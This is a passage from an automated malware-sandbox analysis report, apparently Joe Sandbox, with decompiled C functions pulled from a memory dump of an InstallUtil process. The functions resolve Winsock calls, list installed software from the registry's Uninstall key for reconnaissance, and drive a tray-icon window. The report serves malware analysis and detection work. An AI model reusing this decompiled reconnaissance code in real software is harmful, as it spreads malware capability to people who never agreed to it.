				 *_t63 = "getaddrinfo";
				_v552 = E00411EE3;
				_v548 = "getnameinfo";
				_v544 = E00412189;
				_v540 = "freeaddrinfo";
				_v536 = E00411EA8;
				if( *0x46fdc4 == 0) {
					if(GetSystemDirectoryA( &_v264, 0x104) != 0) {
						E0043DAD7( &_v532, 0x10c,  &_v264);
						E0043DB31( &_v532, 0x10c, "\\ws2_32");
						_t64 = _t63 + 0x18;
						_t57 = LoadLibraryA( &_v532);
						_t54 = 0;
						if(_t57 == 0) {
							L6:
							E0043DAD7( &_v532, 0x10c,  &_v264);
							E0043DB31( &_v532, 0x10c, "\\wship6");
							_t64 = _t64 + 0x18;
							_t57 = LoadLibraryA( &_v532);
							if(_t57 != 0) {
								if(GetProcAddress(_t57, "getaddrinfo") == 0) {
									FreeLibrary(_t57);
									_t57 = _t54;
								}
								if(_t57 != 0) {
									goto L10;
								}
							}
						} else {
							if(GetProcAddress(_t57, "getaddrinfo") == 0) {
								FreeLibrary(_t57);
								_t57 = 0;
							}
							if(_t57 != 0) {
								L10:
								_t52 = _t54;
								while(1) {
									_t42 = GetProcAddress(_t57,  *(_t64 + 0x10 + _t52 * 8));
									 *(_t64 + 0x14 + _t52 * 8) = _t42;
									if(_t42 == 0) {
										break;
									}
									_t52 = _t52 + 1;
									if(_t52 < 3) {
										continue;
									} else {
									}
									L15:
									if(_t57 != 0) {
										do {
											 *((intOrPtr*)(_t54 + 0x46c9ec)) =  *((intOrPtr*)(_t64 + _t54 + 0x14));
											_t54 = _t54 + 8;
										} while (_t54 < 0x18);
									}
									goto L17;
								}
								FreeLibrary(_t57);
								_t57 = _t54;
								goto L15;
							} else {
								goto L6;
							}
						}
						L17:
					}
					 *0x46fdc4 = 1;
				}
				return  *0x46c9ec;
			}

0x0041236c
0x00412373
0x0041237b
0x00412383
0x0041238b
0x00412393
0x0041239b
0x004123b6
0x004123d3
0x004123e3
0x004123e8
0x004123fc
0x00412404
0x00412408
0x0041241f
0x00412432
0x00412442
0x00412447
0x00412455
0x00412459
0x00412465
0x00412468
0x0041246a
0x0041246a
0x0041246e
0x00000000
0x00000000
0x0041246e
0x0041240a
0x00412414
0x00412417
0x00412419
0x00412419
0x0041241d
0x00412470
0x00412470
0x00412472
0x00412477
0x0041247d
0x00412483
0x00000000
0x00000000
0x00412485
0x00412489
0x00000000
0x00000000
0x0041248b
0x00412492
0x00412494
0x00412496
0x0041249a
0x004124a0
0x004124a3
0x00412496
0x00000000
0x00412494
0x0041248e
0x00412490
0x00000000
0x00000000
0x00000000
0x00000000
0x0041241d
0x004124a8
0x004124ab
0x004124ac
0x004124ac
0x004124c1

APIs

GetSystemDirectoryA.KERNEL32 ref: 004123AE
LoadLibraryA.KERNEL32(?), ref: 004123F0
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00412410
FreeLibrary.KERNEL32(00000000), ref: 00412417
LoadLibraryA.KERNEL32(?), ref: 0041244F
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00412461
FreeLibrary.KERNEL32(00000000), ref: 00412468
GetProcAddress.KERNEL32(00000000,?), ref: 00412477
FreeLibrary.KERNEL32(00000000), ref: 0041248E

Strings

getaddrinfo, xrefs: 0041236C, 0041240A, 0041245B
\ws2_32, xrefs: 004123D8
getnameinfo, xrefs: 0041237B
freeaddrinfo, xrefs: 0041238B
\wship6, xrefs: 00412437

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeProc$Load$DirectorySystem
String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
API String ID: 2490988753-744132762
Opcode ID: 91b5bfe2ac3bfb3195a583f8869c99ed9d5d707a353fcf8f79fad41f7cef83cd
Instruction ID: 6baed0d4847e4d040adf0db9f494970dc31872a82d40558cfe56e373b4b0cc2c
Opcode Fuzzy Hash: 91b5bfe2ac3bfb3195a583f8869c99ed9d5d707a353fcf8f79fad41f7cef83cd
Instruction Fuzzy Hash: D331F372806311ABC320EB50DC44ADFB6DCAF85758F01462BF985D3241E7BCD9948AAE

Uniqueness

Uniqueness Score: -1.00%

Function 00418BC0 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214
registryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00418BC0(void* __ebx, void* __ecx, void* __edx) {
				char _v1028;
				char _v1052;
				void* _v1056;
				char _v1076;
				void* _v1080;
				char _v1100;
				void* _v1104;
				char _v1124;
				void* _v1128;
				char _v1148;
				void* _v1152;
				char _v1172;
				void* _v1176;
				char _v1196;
				void* _v1200;
				char _v1220;
				void* _v1224;
				char _v1244;
				void* _v1248;
				char _v1268;
				void* _v1272;
				char _v1292;
				void* _v1296;
				char _v1316;
				void* _v1320;
				char _v1340;
				char _v1364;
				char _v1388;
				char _v1412;
				char _v1436;
				char _v1460;
				void* _v1464;
				char _v1484;
				int _v1488;
				void* _v1492;
				void* _v1496;
				void* __edi;
				void* __ebp;
				long _t73;
				long _t79;
				int _t86;
				void* _t188;
				int _t207;
				void* _t208;
				void* _t210;
				void** _t211;

				_t188 = __edx;
				_t130 = __ebx;
				_t211 =  &_v1496;
				_t208 = __ecx;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall", 0, 0x20019,  &_v1492) == 0) {
					_v1488 = 0x400;
					_t207 = 0;
					E00401F46(__ebx,  &_v1460);
					_t73 = RegEnumKeyExA(_v1492, 0,  &_v1028,  &_v1488, 0, 0, 0, 0);
					_t210 = RegCloseKey;
					while(1) {
						__eflags = _t73 - 0x103;
						if(__eflags == 0) {
							break;
						}
						__eflags = _t73;
						if(_t73 != 0) {
							L8:
							_t207 = _t207 + 1;
							__eflags = _t207;
							_v1488 = 0x400;
						} else {
							_t79 = RegOpenKeyExA(_v1492,  &_v1028, 0, 0x20019,  &_v1496);
							__eflags = _t79;
							if(_t79 == 0) {
								E00410BFA( &_v1484, _v1496, L"DisplayName");
								 *_t211 = L"Publisher";
								E00410BFA( &_v1340, _v1496);
								 *_t211 = L"DisplayVersion";
								E00410BFA( &_v1364, _v1496);
								 *_t211 = L"InstallLocation";
								E00410BFA( &_v1388, _v1496);
								 *_t211 = L"InstallDate";
								E00410BFA( &_v1412, _v1496);
								 *_t211 = L"UninstallString";
								E00410BFA( &_v1436, _v1496);
								_t86 = E00409F76();
								__eflags = _t86;
								if(_t86 == 0) {
									E0040321D(E00402FD4(_t130,  &_v1316, E00402FD4(_t130,  &_v1292, E004042DD(_t130,  &_v1268, E00402FD4(_t130,  &_v1244, E004042DD(_t130,  &_v1220, E00402FD4(_t130,  &_v1196, E004042DD(_t130,  &_v1172, E00402FD4(_t130,  &_v1148, E004042DD(_t130,  &_v1124, E00402FD4(_t130,  &_v1100, E004042DD(_t130,  &_v1076, E004078F9( &_v1052,  &_v1484, _t210, 0x467488), _t210, __eflags,  &_v1364), _t207, _t210, __eflags, 0x467488), _t210, __eflags,  &_v1412), _t207, _t210, __eflags, 0x467488), _t210, __eflags,  &_v1340), _t207, _t210, __eflags, 0x467488), _t210, __eflags,  &_v1388), _t207, _t210, __eflags, 0x467488), _t210, __eflags,  &_v1436), _t207, _t210, __eflags, 0x467488), _t207, _t210, __eflags, "\n"));
									E00401EC9();
									E00401EC9();
									E00401EC9();
									E00401EC9();
									E00401EC9();
									E00401EC9();
									E00401EC9();
									E00401EC9();
									E00401EC9();
									E00401EC9();
									E00401EC9();
									E00401EC9();
								}
								RegCloseKey(_v1496);
								E00401EC9();
								E00401EC9();
								E00401EC9();
								E00401EC9();
								E00401EC9();
								E00401EC9();
								goto L8;
							}
						}
						__eflags = 0;
						_t73 = RegEnumKeyExA(_v1492, _t207,  &_v1028,  &_v1488, 0, 0, 0, 0);
					}
					RegCloseKey(_v1492);
					E00403222(_t130, _t208, _t210, __eflags,  &_v1460);
					E00401EC9();
				} else {
					E0040413E(__ebx, _t208, _t188, 0, 0x4610ec);
				}
				return _t208;
			}

0x00418bc0
0x00418bc0
0x00418bc0
0x00418bd5
0x00418bea
0x00418c01
0x00418c09
0x00418c0b
0x00418c26
0x00418c2c
0x00418ee1
0x00418ee1
0x00418ee6
0x00000000
0x00000000
0x00418c37
0x00418c39
0x00418eba
0x00418eba
0x00418eba
0x00418ebb
0x00418c3f
0x00418c57
0x00418c5d
0x00418c5f
0x00418c72
0x00418c82
0x00418c89
0x00418c99
0x00418ca0
0x00418cad
0x00418cb4
0x00418cc1
0x00418cc8
0x00418cd5
0x00418cdc
0x00418ce6
0x00418ceb
0x00418ced
0x00418de3
0x00418def
0x00418dfb
0x00418e07
0x00418e13
0x00418e1f
0x00418e2b
0x00418e37
0x00418e43
0x00418e4f
0x00418e5b
0x00418e67
0x00418e73
0x00418e73
0x00418e7c
0x00418e82
0x00418e8b
0x00418e94
0x00418ea0
0x00418eac
0x00418eb5
0x00000000
0x00418eb5
0x00418c5f
0x00418ec3
0x00418edb
0x00418edb
0x00418ef0
0x00418ef9
0x00418f02
0x00418bec
0x00418bf3
0x00418bf3
0x00418f12

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 00418BE2
RegEnumKeyExA.ADVAPI32 ref: 00418C26
RegCloseKey.ADVAPI32(?), ref: 00418EF0

Strings

Publisher, xrefs: 00418C82
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00418BD8
InstallDate, xrefs: 00418CC1
UninstallString, xrefs: 00418CD5
InstallLocation, xrefs: 00418CAD
DisplayVersion, xrefs: 00418C99
DisplayName, xrefs: 00418C6D

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
Opcode ID: fc1eae32c231aabd5a7d80c0bfc11da0c77a2d32c50fee05a86febe305fe2445
Instruction ID: ac6cf546619efb93c63312ec69d48949324eae5a406f87cb75c52f424441e797
Opcode Fuzzy Hash: fc1eae32c231aabd5a7d80c0bfc11da0c77a2d32c50fee05a86febe305fe2445
Instruction Fuzzy Hash: 4F8132711183819BC324EB11DC51EEFB3E9AF94308F10492FF586921E2EF34A949CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00419E78 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74
windowCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00419E78(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				void* _t16;
				struct HMENU__* _t17;
				void* _t20;
				void* _t24;

				_t16 = _a8 - 1;
				if(_t16 == 0) {
					_t17 = CreatePopupMenu();
					 *0x46deb0 = _t17;
					AppendMenuA(_t17, 0, 0, "Close");
					L15:
					return 0;
				}
				_t20 = _t16 - 0x110;
				if(_t20 == 0) {
					if(_a12 != 0) {
						goto L15;
					}
					Shell_NotifyIconA(2, 0x46deb8);
					ExitProcess(0);
				}
				if(_t20 == 0x2f0) {
					_t24 = _a16 - 0x201;
					if(_t24 == 0) {
						if(IsWindowVisible( *0x46deb4) == 0) {
							ShowWindow( *0x46deb4, 9);
							SetForegroundWindow( *0x46deb4);
						} else {
							ShowWindow( *0x46deb4, 0);
						}
						goto L15;
					}
					if(_t24 == 3) {
						GetCursorPos( &_v12);
						SetForegroundWindow(_a4);
						TrackPopupMenu( *0x46deb0, 0, _v12, _v12.y, 0, _a4, 0);
						goto L15;
					}
					_push(_a16);
					_push(_a12);
					_push(0x401);
					L7:
					return DefWindowProcA(_a4, ??, ??, ??);
				}
				_push(_a16);
				_push(_a12);
				_push(_a8);
				goto L7;
			}

0x00419e80
0x00419e83
0x00419f54
0x00419f61
0x00419f69
0x00419f6f
0x00000000
0x00419f6f
0x00419e89
0x00419e8e
0x00419f3d
0x00000000
0x00000000
0x00419f46
0x00419f4e
0x00419f4e
0x00419e99
0x00419ea9
0x00419eae
0x00419f0b
0x00419f25
0x00419f31
0x00419f0d
0x00419f15
0x00419f15
0x00000000
0x00419f0b
0x00419eb3
0x00419ed2
0x00419edb
0x00419ef5
0x00000000
0x00419ef5
0x00419eb5
0x00419eb8
0x00419ebb
0x00419ec0
0x00000000
0x00419ec3
0x00419e9b
0x00419e9e
0x00419ea1
0x00000000

APIs

DefWindowProcA.USER32(?,00000401,?,?), ref: 00419EC3
GetCursorPos.USER32(?), ref: 00419ED2
SetForegroundWindow.USER32(?), ref: 00419EDB
TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00419EF5
Shell_NotifyIconA.SHELL32(00000002,0046DEB8), ref: 00419F46
ExitProcess.KERNEL32 ref: 00419F4E
CreatePopupMenu.USER32 ref: 00419F54
AppendMenuA.USER32 ref: 00419F69

Strings

Close, xrefs: 00419F5A

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
String ID: Close
API String ID: 1657328048-3535843008
Opcode ID: 19b134224e6445c5e95f1e71c29887f026828f1ae5936c10d6d4738a5a3f977e
Instruction ID: d968d28f45dd76fa53ff807e51d9aa01234c839a4410edc7000f177ae0e62058
Opcode Fuzzy Hash: 19b134224e6445c5e95f1e71c29887f026828f1ae5936c10d6d4738a5a3f977e
Instruction Fuzzy Hash: 56211D31604204FFDB094FA4EE1DBAA3B75FB18306F000126F901981B1D7B6EDA1EB19

Uniqueness

Uniqueness Score: -1.00%

Function 00441E16 Relevance: 22.8, APIs: 15, Instructions: 296
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00441E16(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				char _v21;
				intOrPtr _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				void* _v52;
				signed int* _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				signed int* _v68;
				void* _v72;
				char _v76;
				signed int _t101;
				signed int _t123;
				signed short _t126;
				void* _t130;
				void* _t134;
				void* _t137;
				void* _t138;
				intOrPtr _t139;
				void* _t141;
				signed int _t142;
				intOrPtr* _t143;
				signed char _t160;
				signed char _t165;
				signed int _t166;
				void* _t168;
				signed int _t170;
				void* _t179;
				signed int* _t180;
				signed int* _t181;
				signed int _t182;
				signed char* _t189;
				signed char* _t190;
				signed int _t192;
				void* _t193;
				intOrPtr _t197;
				short* _t209;
				intOrPtr* _t211;
				intOrPtr* _t215;
				signed int _t216;
				signed int _t217;
				void* _t218;
				void* _t219;

				_t101 =  *0x46c00c; // 0xe1ce05e9
				_v8 = _t101 ^ _t217;
				_t211 = _a4;
				_t170 = 0;
				_v64 = _t211;
				_v32 = 0;
				_t172 =  *((intOrPtr*)(_t211 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v52 = 0;
				_v76 = _t211;
				_v72 = 0;
				if( *((intOrPtr*)(_t211 + 0xa8)) == 0) {
					__eflags =  *(_t211 + 0x8c);
					if( *(_t211 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t211 + 0x8c) = _t170;
					__eflags = 0;
					 *(_t211 + 0x90) = _t170;
					 *_t211 = 0x458870;
					 *((intOrPtr*)(_t211 + 0x94)) = 0x458af0;
					 *((intOrPtr*)(_t211 + 0x98)) = 0x458c70;
					 *((intOrPtr*)(_t211 + 4)) = 1;
					L41:
					return E004318FB(_v8 ^ _t217);
				}
				_t106 = _t211 + 8;
				_v44 = 0;
				if( *(_t211 + 8) != 0) {
					L3:
					_v44 = E00441BB3(_t172, 1, 4);
					E004427C2(_t170);
					_v32 = E00441BB3(_t172, 0x180, 2);
					E004427C2(_t170);
					_v36 = E00441BB3(_t172, 0x180, 1);
					E004427C2(_t170);
					_v40 = E00441BB3(_t172, 0x180, 1);
					E004427C2(_t170);
					_t197 = E00441BB3(_t172, 0x101, 1);
					_v52 = _t197;
					E004427C2(_t170);
					_t219 = _t218 + 0x3c;
					if(_v44 == _t170 || _v32 == _t170 || _t197 == 0 || _v36 == _t170 || _v40 == _t170) {
						L36:
						E004427C2(_v44);
						E004427C2(_v32);
						E004427C2(_v36);
						E004427C2(_v40);
						_t170 = 1;
						__eflags = 1;
						goto L37;
					} else {
						_t123 = _t170;
						do {
							 *(_t123 + _t197) = _t123;
							_t123 = _t123 + 1;
						} while (_t123 < 0x100);
						if(GetCPInfo( *(_t211 + 8),  &_v28) == 0) {
							goto L36;
						}
						_t126 = _v28;
						_t235 = _t126 - 5;
						if(_t126 > 5) {
							goto L36;
						}
						_t28 = _t197 + 1; // 0x1
						_v48 = _t126 & 0x0000ffff;
						_t192 = 0xff;
						_t130 = E00445CF2(_t197, _t211, _t235, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						_t236 = _t130;
						if(_t130 == 0) {
							goto L36;
						}
						_t34 = _t197 + 1; // 0x1
						_t134 = E00445CF2(_t197, _t211, _t236, _t170,  *((intOrPtr*)(_t211 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t211 + 8), _t170);
						_t219 = _t219 + 0x24;
						if(_t134 == 0) {
							goto L36;
						}
						if(_v48 <= 1 || _v22 == _t170) {
							L22:
							_v60 = _v32 + 0x100;
							_t137 = E0044CE9D(_t170, _t192, _t197, _t211, _t242, _t170, 1, _t197, 0x100, _v32 + 0x100,  *(_t211 + 8), _t170);
							_t219 = _t219 + 0x1c;
							if(_t137 == 0) {
								goto L36;
							}
							_t193 = _v32;
							_t138 = _t193 + 0xfe;
							 *_t138 = 0;
							_t179 = _v36;
							_v32 = _t138;
							_t139 = _v40;
							 *(_t179 + 0x7f) = _t170;
							_t180 = _t179 - 0xffffff80;
							 *(_t139 + 0x7f) = _t170;
							_v68 = _t180;
							 *_t180 = _t170;
							_t181 = _t139 + 0x80;
							_v56 = _t181;
							 *_t181 = _t170;
							if(_v48 <= 1 || _v22 == _t170) {
								L32:
								_t182 = 0x3f;
								memcpy(_t193, _t193 + 0x200, _t182 << 2);
								_push(0x1f);
								asm("movsw");
								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
								_push(0x1f);
								asm("movsw");
								asm("movsb");
								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
								asm("movsw");
								asm("movsb");
								_t215 = _v64;
								if( *((intOrPtr*)(_t215 + 0x8c)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t142 | 0xffffffff) == 0) {
										E004427C2( *(_t215 + 0x90) - 0xfe);
										E004427C2( *(_t215 + 0x94) - 0x80);
										E004427C2( *(_t215 + 0x98) - 0x80);
										E004427C2( *((intOrPtr*)(_t215 + 0x8c)));
									}
								}
								_t143 = _v44;
								 *_t143 = 1;
								 *((intOrPtr*)(_t215 + 0x8c)) = _t143;
								 *_t215 = _v60;
								 *(_t215 + 0x90) = _v32;
								 *(_t215 + 0x94) = _v68;
								 *(_t215 + 0x98) = _v56;
								 *(_t215 + 4) = _v48;
								L37:
								E004427C2(_v52);
								goto L41;
							} else {
								_t189 =  &_v21;
								while(1) {
									_t160 =  *_t189;
									if(_t160 == 0) {
										break;
									}
									_t216 =  *(_t189 - 1) & 0x000000ff;
									if(_t216 > (_t160 & 0x000000ff)) {
										L30:
										_t189 =  &(_t189[2]);
										if( *(_t189 - 1) != _t170) {
											continue;
										}
										break;
									}
									_t209 = _t193 + 0x100 + _t216 * 2;
									do {
										_t216 = _t216 + 1;
										 *_t209 = 0x8000;
										_t209 = _t209 + 2;
									} while (_t216 <= ( *_t189 & 0x000000ff));
									goto L30;
								}
								goto L32;
							}
						} else {
							_t190 =  &_v21;
							while(1) {
								_t165 =  *_t190;
								if(_t165 == 0) {
									goto L22;
								}
								_t192 =  *(_t190 - 1) & 0x000000ff;
								_t166 = _t165 & 0x000000ff;
								while(_t192 <= _t166) {
									 *((char*)(_t192 + _t197)) = 0x20;
									_t192 = _t192 + 1;
									__eflags = _t192;
									_t166 =  *_t190 & 0x000000ff;
								}
								_t190 =  &(_t190[2]);
								_t242 =  *(_t190 - 1) - _t170;
								if( *(_t190 - 1) != _t170) {
									continue;
								}
								goto L22;
							}
							goto L22;
						}
					}
				}
				_t168 = E0044EBE5(0, __edx, __edi, _t211,  &_v76, 0, _t172, 0x1004, _t106);
				_t219 = _t218 + 0x14;
				if(_t168 != 0) {
					goto L36;
				}
				goto L3;
			}

0x00441e1e
0x00441e25
0x00441e2a
0x00441e2d
0x00441e30
0x00441e33
0x00441e36
0x00441e3c
0x00441e3f
0x00441e42
0x00441e45
0x00441e48
0x00441e4d
0x0044216d
0x0044216f
0x00442171
0x00442171
0x00442174
0x0044217a
0x0044217c
0x00442182
0x00442188
0x00442192
0x0044219c
0x004421a3
0x004421b3
0x004421b3
0x00441e53
0x00441e56
0x00441e5b
0x00441e79
0x00441e83
0x00441e86
0x00441e99
0x00441e9c
0x00441eaa
0x00441ead
0x00441ebb
0x00441ebe
0x00441ecf
0x00441ed2
0x00441ed5
0x00441eda
0x00441ee0
0x00442134
0x00442137
0x0044213f
0x00442147
0x0044214f
0x00442159
0x00442159
0x00000000
0x00441f09
0x00441f09
0x00441f0b
0x00441f0b
0x00441f0e
0x00441f0f
0x00441f25
0x00000000
0x00000000
0x00441f2b
0x00441f2e
0x00441f31
0x00000000
0x00000000
0x00441f3e
0x00441f41
0x00441f44
0x00441f61
0x00441f66
0x00441f69
0x00441f6b
0x00000000
0x00000000
0x00441f85
0x00441f95
0x00441f9a
0x00441f9f
0x00000000
0x00000000
0x00441fa9
0x00441fd6
0x00441fec
0x00441fef
0x00441ff4
0x00441ff9
0x00000000
0x00000000
0x00441fff
0x00442004
0x0044200a
0x0044200d
0x00442010
0x00442013
0x00442016
0x00442019
0x00442020
0x00442023
0x00442026
0x00442028
0x0044202e
0x00442031
0x00442033
0x00442075
0x00442077
0x00442080
0x00442085
0x00442088
0x00442092
0x00442094
0x00442097
0x00442099
0x004420a2
0x004420a4
0x004420a6
0x004420a7
0x004420b2
0x004420b7
0x004420bb
0x004420c9
0x004420dc
0x004420ea
0x004420f5
0x004420fa
0x004420bb
0x004420fd
0x00442100
0x00442106
0x0044210f
0x00442114
0x0044211d
0x00442126
0x0044212f
0x0044215a
0x0044215d
0x00000000
0x0044203a
0x0044203a
0x0044203d
0x0044203d
0x00442041
0x00000000
0x00000000
0x00442043
0x0044204c
0x0044206a
0x0044206a
0x00442070
0x00000000
0x00000000
0x00000000
0x00442070
0x00442054
0x00442057
0x0044205c
0x0044205d
0x00442060
0x00442066
0x00000000
0x00442057
0x00000000
0x00442072
0x00441fb0
0x00441fb0
0x00441fb3
0x00441fb3
0x00441fb7
0x00000000
0x00000000
0x00441fb9
0x00441fbd
0x00441fca
0x00441fc2
0x00441fc6
0x00441fc6
0x00441fc7
0x00441fc7
0x00441fce
0x00441fd1
0x00441fd4
0x00000000
0x00000000
0x00000000
0x00441fd4
0x00000000
0x00441fb3
0x00441fa9
0x00441ee0
0x00441e69
0x00441e6e
0x00441e73
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 00441E86
_free.LIBCMT ref: 00441E9C
_free.LIBCMT ref: 00441EAD
_free.LIBCMT ref: 00441EBE
_free.LIBCMT ref: 00441ED5
GetCPInfo.KERNEL32(?,?), ref: 00441F1D

Part of subcall function 0044EBE5: _free.LIBCMT ref: 0044EC50

_free.LIBCMT ref: 004420C9
_free.LIBCMT ref: 004420DC
_free.LIBCMT ref: 004420EA
_free.LIBCMT ref: 004420F5
_free.LIBCMT ref: 00442137
_free.LIBCMT ref: 0044213F
_free.LIBCMT ref: 00442147
_free.LIBCMT ref: 0044214F
_free.LIBCMT ref: 0044215D

Memory Dump Source

Source File: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_InstallUtil.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: a1cad53ea91165d0db56accbaabdea4ba71c576b8a85ea07d6ee0cbfa5762954
Instruction ID: b31c419f4cfa1cef3f21f0d24aa3bcbc0ab6427042d84dd07d5ee1350d7856e5
Opcode Fuzzy Hash: a1cad53ea91165d0db56accbaabdea4ba71c576b8a85ea07d6ee0cbfa5762954
Instruction Fuzzy Hash: FBB1BE719002059FEB10DFBAC981BAEBBF4FF08304F54406EF995A7252DBB99841CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0044D037 Relevance: 19.6, APIs: 13, Instructions: 114
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0044D037(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x46c178) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E004427C2(_t46);
							E0044C273( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E004427C2(_t47);
							E0044C72D( *((intOrPtr*)(_t74 + 0x88)));
						}
						E004427C2( *((intOrPtr*)(_t74 + 0x7c)));
						E004427C2( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E004427C2( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E004427C2( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E004427C2( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E004427C2( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E0044D1AA( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xaa
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x32
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x46c298) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E004427C2(_t31);
							E004427C2( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E004427C2(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E004427C2(_t74);
			}

0x0044d03f
0x0044d043
0x0044d04b
0x0044d054
0x0044d059
0x0044d060
0x0044d068
0x0044d070
0x0044d07b
0x0044d081
0x0044d082
0x0044d08a
0x0044d092
0x0044d09d
0x0044d0a3
0x0044d0a7
0x0044d0b2
0x0044d0b8
0x0044d059
0x0044d0b9
0x0044d0c1
0x0044d0d4
0x0044d0e7
0x0044d0f5
0x0044d100
0x0044d105
0x0044d10e
0x0044d116
0x0044d117
0x0044d117
0x0044d11d
0x0044d120
0x0044d120
0x0044d123
0x0044d12a
0x0044d12c
0x0044d130
0x0044d138
0x0044d13f
0x0044d145
0x0044d146
0x0044d146
0x0044d14d
0x0044d14f
0x0044d154
0x0044d15c
0x0044d161
0x0044d162
0x0044d162
0x0044d165
0x0044d168
0x0044d16b
0x0044d16e
0x0044d16e
0x0044d180

APIs

___free_lconv_mon.LIBCMT ref: 0044D07B

Part of subcall function 0044C273: _free.LIBCMT ref: 0044C290
Part of subcall function 0044C273: _free.LIBCMT ref: 0044C2A2
Part of subcall function 0044C273: _free.LIBCMT ref: 0044C2B4
Part of subcall function 0044C273: _free.LIBCMT ref: 0044C2C6
Part of subcall function 0044C273: _free.LIBCMT ref: 0044C2D8
Part of subcall function 0044C273: _free.LIBCMT ref: 0044C2EA
Part of subcall function 0044C273: _free.LIBCMT ref: 0044C2FC
Part of subcall function 0044C273: _free.LIBCMT ref: 0044C30E
Part of subcall function 0044C273: _free.LIBCMT ref: 0044C320
Part of subcall function 0044C273: _free.LIBCMT ref: 0044C332
Part of subcall function 0044C273: _free.LIBCMT ref: 0044C344
Part of subcall function 0044C273: _free.LIBCMT ref: 0044C356
Part of subcall function 0044C273: _free.LIBCMT ref: 0044C368

_free.LIBCMT ref: 0044D070

Part of subcall function 004427C2: HeapFree.KERNEL32(00000000,00000000,?,0044C9E0,0000000A,00000000,0000000A,00000000,?,0044CC84,0000000A,00000007,0000000A,?,0044D1CF,0000000A), ref: 004427D8
